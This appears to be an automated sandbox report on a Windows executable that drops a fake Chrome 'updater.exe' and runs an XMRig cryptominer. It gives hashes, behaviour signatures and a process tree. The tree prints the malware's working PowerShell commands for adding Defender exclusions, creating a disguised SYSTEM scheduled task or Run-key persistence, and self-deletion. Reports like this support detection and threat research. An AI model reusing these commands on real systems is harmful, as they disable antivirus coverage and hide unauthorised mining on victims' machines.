Resubmissions
10/07/2023, 09:55
230710-lxskxsaf4t 1031/05/2023, 16:56
230531-vfmssagf4z 1031/05/2023, 16:50
230531-vcdeyagb66 1031/05/2023, 16:49
230531-vbs41age81 1031/05/2023, 16:49
230531-vbraeage8z 1005/05/2023, 05:31
230505-f72npage67 1005/05/2023, 05:31
230505-f7zjbsad9z 1005/05/2023, 05:31
230505-f7wgnsge66 1005/05/2023, 05:30
230505-f7keeage64 1004/05/2023, 10:10
230504-l7mgnabe89 10Analysis
-
max time kernel
1800s -
max time network
1786s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
05/05/2023, 05:30
Static task
static1
Behavioral task
behavioral1
Sample
qM5GMXBk6hJE6Y5e.exe
Resource
win7-20230220-en
General
-
Target
qM5GMXBk6hJE6Y5e.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
description pid Process procid_target PID 1708 created 1220 1708 qM5GMXBk6hJE6Y5e.exe 14 PID 1708 created 1220 1708 qM5GMXBk6hJE6Y5e.exe 14 PID 1708 created 1220 1708 qM5GMXBk6hJE6Y5e.exe 14 PID 1708 created 1220 1708 qM5GMXBk6hJE6Y5e.exe 14 PID 1052 created 1220 1052 updater.exe 14 PID 1052 created 1220 1052 updater.exe 14 PID 1052 created 1220 1052 updater.exe 14 PID 1052 created 1220 1052 updater.exe 14 PID 1056 created 1220 1056 conhost.exe 14 PID 1052 created 1220 1052 updater.exe 14 -
XMRig Miner payload 31 IoCs
resource yara_rule behavioral1/memory/1696-103-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-107-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-108-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-111-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-114-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-116-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-118-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-120-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-122-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-124-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-126-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-128-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-130-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-132-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-134-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-136-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-138-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-140-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-142-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-144-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-146-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-148-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-150-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-152-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-154-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-156-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-158-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-160-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-162-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-164-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/1696-166-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Deletes itself 1 IoCs
pid Process 1396 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 1052 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 1744 taskeng.exe -
resource yara_rule behavioral1/memory/1696-103-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-107-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-108-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-111-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-114-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-116-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-118-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-120-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-122-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-124-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-126-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-128-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-130-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-132-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-134-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-136-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-138-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-140-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-142-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-144-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-146-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-148-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-150-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-152-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-154-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-156-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-158-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-160-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-162-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-164-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/1696-166-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1052 set thread context of 1056 1052 updater.exe 46 PID 1052 set thread context of 1696 1052 updater.exe 53 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe qM5GMXBk6hJE6Y5e.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1920 schtasks.exe 1740 schtasks.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f00bae9b237fd901 powershell.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 1708 qM5GMXBk6hJE6Y5e.exe 1708 qM5GMXBk6hJE6Y5e.exe 624 powershell.exe 1708 qM5GMXBk6hJE6Y5e.exe 1708 qM5GMXBk6hJE6Y5e.exe 1060 powershell.exe 1708 qM5GMXBk6hJE6Y5e.exe 1708 qM5GMXBk6hJE6Y5e.exe 1708 qM5GMXBk6hJE6Y5e.exe 1708 qM5GMXBk6hJE6Y5e.exe 1752 powershell.exe 1052 updater.exe 1052 updater.exe 1732 powershell.exe 1052 updater.exe 1052 updater.exe 432 powershell.exe 1052 updater.exe 1052 updater.exe 1052 updater.exe 1052 updater.exe 1056 conhost.exe 1056 conhost.exe 1052 updater.exe 1052 updater.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 31 IoCs
description pid Process Token: SeDebugPrivilege 624 powershell.exe Token: SeDebugPrivilege 1060 powershell.exe Token: SeDebugPrivilege 1752 powershell.exe Token: SeDebugPrivilege 1732 powershell.exe Token: SeDebugPrivilege 432 powershell.exe Token: SeDebugPrivilege 1052 updater.exe Token: SeAssignPrimaryTokenPrivilege 1608 WMIC.exe Token: SeIncreaseQuotaPrivilege 1608 WMIC.exe Token: SeSecurityPrivilege 1608 WMIC.exe Token: SeTakeOwnershipPrivilege 1608 WMIC.exe Token: SeLoadDriverPrivilege 1608 WMIC.exe Token: SeSystemtimePrivilege 1608 WMIC.exe Token: SeBackupPrivilege 1608 WMIC.exe Token: SeRestorePrivilege 1608 WMIC.exe Token: SeShutdownPrivilege 1608 WMIC.exe Token: SeSystemEnvironmentPrivilege 1608 WMIC.exe Token: SeUndockPrivilege 1608 WMIC.exe Token: SeManageVolumePrivilege 1608 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1608 WMIC.exe Token: SeIncreaseQuotaPrivilege 1608 WMIC.exe Token: SeSecurityPrivilege 1608 WMIC.exe Token: SeTakeOwnershipPrivilege 1608 WMIC.exe Token: SeLoadDriverPrivilege 1608 WMIC.exe Token: SeSystemtimePrivilege 1608 WMIC.exe Token: SeBackupPrivilege 1608 WMIC.exe Token: SeRestorePrivilege 1608 WMIC.exe Token: SeShutdownPrivilege 1608 WMIC.exe Token: SeSystemEnvironmentPrivilege 1608 WMIC.exe Token: SeUndockPrivilege 1608 WMIC.exe Token: SeManageVolumePrivilege 1608 WMIC.exe Token: SeLockMemoryPrivilege 1696 conhost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 1060 wrote to memory of 1920 1060 powershell.exe 32 PID 1060 wrote to memory of 1920 1060 powershell.exe 32 PID 1060 wrote to memory of 1920 1060 powershell.exe 32 PID 1396 wrote to memory of 952 1396 cmd.exe 37 PID 1396 wrote to memory of 952 1396 cmd.exe 37 PID 1396 wrote to memory of 952 1396 cmd.exe 37 PID 1752 wrote to memory of 1064 1752 powershell.exe 38 PID 1752 wrote to memory of 1064 1752 powershell.exe 38 PID 1752 wrote to memory of 1064 1752 powershell.exe 38 PID 1744 wrote to memory of 1052 1744 taskeng.exe 40 PID 1744 wrote to memory of 1052 1744 taskeng.exe 40 PID 1744 wrote to memory of 1052 1744 taskeng.exe 40 PID 432 wrote to memory of 1740 432 powershell.exe 45 PID 432 wrote to memory of 1740 432 powershell.exe 45 PID 432 wrote to memory of 1740 432 powershell.exe 45 PID 1052 wrote to memory of 1056 1052 updater.exe 46 PID 2024 wrote to memory of 1608 2024 cmd.exe 51 PID 2024 wrote to memory of 1608 2024 cmd.exe 51 PID 2024 wrote to memory of 1608 2024 cmd.exe 51 PID 1052 wrote to memory of 1696 1052 updater.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e.exe"C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:1920
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\qM5GMXBk6hJE6Y5e.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:952
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:1064
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:1740
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:1056
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:2032
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {372CAC3C-3FEF-429C-A4CF-B8997DFDEE4F} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1052
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD5a16a669a09bf158058b83e04e69fe38e
SHA1f6c94763850d9e590d86057139e8895a7aacdeea
SHA256cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
SHA512658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
Filesize
2.0MB
MD5a16a669a09bf158058b83e04e69fe38e
SHA1f6c94763850d9e590d86057139e8895a7aacdeea
SHA256cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
SHA512658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5176a1042bb078090bea0e4359318fa5d
SHA1ced09e4ac1efc56a4c5b9d4937749fb2161ec0df
SHA256c6e1bd6775fd9eae99addc9b66ccb00d3396bd83c778a213344d8f5eaba1da8f
SHA512992082d42e54df7f514a51409b2d04050f4821d039f4c441461311f3d4f5b680ca98f199884190a6d10ce70b14a69f0493503dd164f957929044abd6f3ee32eb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5176a1042bb078090bea0e4359318fa5d
SHA1ced09e4ac1efc56a4c5b9d4937749fb2161ec0df
SHA256c6e1bd6775fd9eae99addc9b66ccb00d3396bd83c778a213344d8f5eaba1da8f
SHA512992082d42e54df7f514a51409b2d04050f4821d039f4c441461311f3d4f5b680ca98f199884190a6d10ce70b14a69f0493503dd164f957929044abd6f3ee32eb
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZYMC3NNOPYNN9WACC4N5.temp
Filesize7KB
MD5176a1042bb078090bea0e4359318fa5d
SHA1ced09e4ac1efc56a4c5b9d4937749fb2161ec0df
SHA256c6e1bd6775fd9eae99addc9b66ccb00d3396bd83c778a213344d8f5eaba1da8f
SHA512992082d42e54df7f514a51409b2d04050f4821d039f4c441461311f3d4f5b680ca98f199884190a6d10ce70b14a69f0493503dd164f957929044abd6f3ee32eb
-
Filesize
2.0MB
MD5a16a669a09bf158058b83e04e69fe38e
SHA1f6c94763850d9e590d86057139e8895a7aacdeea
SHA256cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
SHA512658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6